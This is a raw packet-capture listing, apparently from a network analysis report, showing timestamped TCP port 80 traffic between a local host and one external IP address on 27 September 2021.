Sep 27, 2021 10:59:47.206134081 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.206162930 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.206191063 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.206198931 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.206218004 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.206245899 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.206273079 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.206278086 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.206298113 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.206334114 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.206356049 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.206479073 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.206507921 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.206532001 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.206532001 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.206556082 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.206581116 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.206584930 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.206587076 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.206604958 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.206624031 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.207041979 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207098007 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.207107067 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207151890 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.207156897 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207185984 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207207918 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.207212925 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207241058 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207252979 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.207276106 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207281113 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.207283974 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.207305908 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207334995 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207364082 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.207369089 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207370043 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.207391977 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.207396030 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207422018 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207425117 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.207451105 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.207526922 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.207602978 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207629919 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207653046 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207654953 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.207676888 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207679987 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.207695007 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.207701921 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207731009 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.207745075 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.207746983 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208065033 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208082914 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208096027 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208108902 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208122015 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208142042 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208168030 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208220959 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208237886 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208261013 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208281040 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208282948 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208301067 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208318949 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208337069 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208372116 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208375931 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208479881 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208504915 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208530903 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208542109 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208575010 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208580971 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208601952 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208614111 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208630085 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208645105 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208653927 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208678961 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208693981 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208698988 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208713055 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208739042 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208743095 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208761930 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208777905 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208790064 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208800077 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208812952 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208828926 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208831072 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208852053 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208872080 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208892107 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208915949 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208925009 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.208936930 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208959103 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208966970 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.208986998 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.209248066 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209325075 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.209338903 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209371090 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209393978 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.209402084 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209431887 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209454060 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.209460974 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.209465027 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209466934 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.209491014 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209516048 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.209518909 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209556103 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.209579945 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.209594965 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209656000 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.209671974 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209696054 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209719896 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.209721088 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209731102 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209758997 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.209767103 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209789038 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.209795952 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209815979 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209835052 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.209849119 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209858894 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.209887981 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.209906101 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.209968090 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.210134029 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210155964 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210182905 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210206985 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210215092 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.210227966 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.210243940 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210259914 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.210275888 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210303068 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210314035 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.210326910 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210366964 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.210402012 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.210406065 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.210527897 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210563898 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210592031 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.210594893 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210617065 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210617065 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.210635900 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210647106 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.210649014 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210675955 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.210714102 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.210828066 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210855007 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210882902 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210915089 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.210925102 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.210941076 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.210963964 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.210997105 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211023092 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.211025000 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211051941 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211052895 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.211075068 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.211086035 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211096048 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.211138010 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.211278915 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211338043 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.211401939 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211427927 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211452961 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211482048 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.211487055 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.211497068 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211515903 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.211520910 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211544991 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211549997 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.211570024 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211575985 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.211599112 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211606979 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.211620092 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211636066 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.211639881 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211671114 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211673021 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.211697102 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211699963 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.211721897 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211745977 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.211747885 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211774111 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211774111 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.211796045 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.211813927 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.318006039 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.318052053 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.318083048 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.318113089 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.318125963 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.318142891 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.318151951 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.318176031 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.318202019 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.318224907 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.318233967 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.318253040 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.318274975 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.318301916 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.318325996 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.318336010 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.318356991 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.318391085 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.318393946 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.318418026 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.318429947 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.318435907 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.318463087 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.318464994 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.318504095 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.318866968 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.318932056 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.319036007 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.319087982 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.319097996 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.319169998 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.319204092 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.319215059 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.319226980 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.319262981 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.319341898 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.319423914 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.319457054 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.319483995 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.319513083 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.319561958 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.319577932 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.319597960 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.319601059 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.319633007 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.319681883 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.319693089 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.319715977 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.319741011 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.319749117 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.319775105 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.319798946 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.319816113 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.319849968 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.319853067 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.319885015 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.319907904 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.319931984 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.319963932 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.320121050 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.320168018 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.320199013 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.320224047 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.320228100 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.320271015 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.320288897 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.320293903 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.320297003 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.320303917 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.320338011 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.320331097 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.320398092 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.320446968 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.320487976 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.320534945 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.320559025 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.320583105 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.320607901 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.320622921 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.320628881 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.320655107 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.320697069 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.320914984 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.320950031 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.320988894 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321001053 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321019888 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321034908 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321068048 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321070910 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321099997 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321110964 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321146011 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321130991 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321177006 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321177006 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321198940 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321218014 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321242094 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321268082 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321274042 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321274042 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321306944 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321341038 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321324110 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321361065 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321372986 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321396112 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321410894 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321429014 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321443081 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321466923 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321496964 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321501017 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321501970 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321521044 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321531057 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321557999 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321579933 CEST	80	49828	23.146.242.85	192.168.2.4
Sep 27, 2021 10:59:47.321592093 CEST	49828	80	192.168.2.4	23.146.242.85
Sep 27, 2021 10:59:47.321597099 CEST	49828	80	192.168.2.4	23.146.242.85
